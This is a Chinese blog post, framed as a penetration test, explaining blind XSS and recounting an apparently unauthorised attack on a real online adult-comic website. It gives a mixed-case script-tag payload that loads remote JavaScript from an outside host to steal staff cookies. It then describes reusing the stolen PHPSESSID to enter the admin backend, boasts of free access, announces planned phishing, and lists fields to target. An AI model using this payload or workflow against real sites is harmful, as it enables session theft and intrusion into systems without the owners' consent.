wmSafe致力于互联网资源
道可道,非恒道,名可名,非恒名

【渗透测试】记一次在线S情漫画网站的XSS盲打,成功替换cookie拿下后台!

本文最后更新于 2022-5-27 ,已经有 123 天 没有更新,如果文章内容或图片资源失效,请留言反馈,我们会及时处理,谢谢!

0x00 什么是XSS盲打?

简单来说,盲打就是在一切可能的地方尽可能多的提交XSS语句,然后看哪一条会被执行,就能获取管理员的Cooike。趁着没过期赶紧用了,这样就能直接管理员进后台。然后再上传一句话,Getshell。

盲打只是一种惯称的说法,就是不知道后台不知道有没有xss存在的情况下,不顾一切的输入XSS代码在留言啊,feedback啊之类的地方,尽可能多的尝试XSS的语句与语句的存在方式,就叫盲打。

"XSS盲打"是指在攻击者对数据提交后展现的后台未知的情况下,网站采用了攻击者插入了带真实攻击功能的XSS攻击代码(通常是使用script标签引入远程的js)的数据。当未知后台在展现时没有对这些提交的数据进行过滤,那么后台管理人员在操作时就会触发XSS来实现攻击者预定好的“真实攻击功能”。

通俗讲就是见到输入框就输入提前准备的XSS代码, 通常是使用script标签引入远程的js代码,当有后台人员审核提交数据时候,点击了提交的数据,触发获取到有价值信息 。

关于“盲打”这个词语的出现,最早应该是在wooyun里id为“胯下有杀气”的马甲提出的。最早的一个wooyun案列是2012年7月提交的《WooYun-2012-09547》 ,由此xss盲打火了起来


0x01 实战案例-S情漫画的一次XSS盲打

【渗透测试】记一次在线S情漫画网站的XSS盲打,成功替换cookie拿下后台!
【渗透测试】记一次在线S情漫画网站的XSS盲打,成功替换cookie拿下后台!
【渗透测试】记一次在线S情漫画网站的XSS盲打,成功替换cookie拿下后台!

XSS Payload:

<sCRiPt sRC=https://xx.xx/dxxR></sCrIpT>

【渗透测试】记一次在线S情漫画网站的XSS盲打,成功替换cookie拿下后台!
然后提交等待管理员或者运营人员看见,可能就会触发

0x02 鱼儿上钩了兄弟们

XSS后台成功看到了打中的消息,访问后台,替换Cookie进入后台,测试发现只需要PHPSESSID的值即可进入后台
【渗透测试】记一次在线S情漫画网站的XSS盲打,成功替换cookie拿下后台!

Chrome如何不使用插件就替换Cookie值?
F12,打开
然后看左边,选择Cookies,点击当前网址
然后右边就有字段和值
双击该字段或者值即可修改
没有的值,双击下面空白处即可新建
【渗透测试】记一次在线S情漫画网站的XSS盲打,成功替换cookie拿下后台!

进入后台

【渗透测试】记一次在线S情漫画网站的XSS盲打,成功替换cookie拿下后台!
白嫖看漫画,舒服了
【渗透测试】记一次在线S情漫画网站的XSS盲打,成功替换cookie拿下后台!
后台尝试了文件上传,均被传到CDN和图片服务器,Flash钓鱼下次再干他

常见XSS盲打点:

1.各类APP的投诉以及建议的地方
2.留言评论处,反馈处等
3.充值需要提交给后台审核处
4.名字,个人签名以及头像处等等
5.更多的大家留言补充吧
【渗透测试】记一次在线S情漫画网站的XSS盲打,成功替换cookie拿下后台!

本原创文章未经允许不得转载 | 若要转载请注明出处,否则将承担相应的法律责任!
本文链接:https://blog.wm404.com/2022/05/27/44bee402.html
赞赏排名 赞赏支持

评论

  • captcha
暂无评论,要不来一发?

您的关注就是我们最大的支持

联系我们 关于我们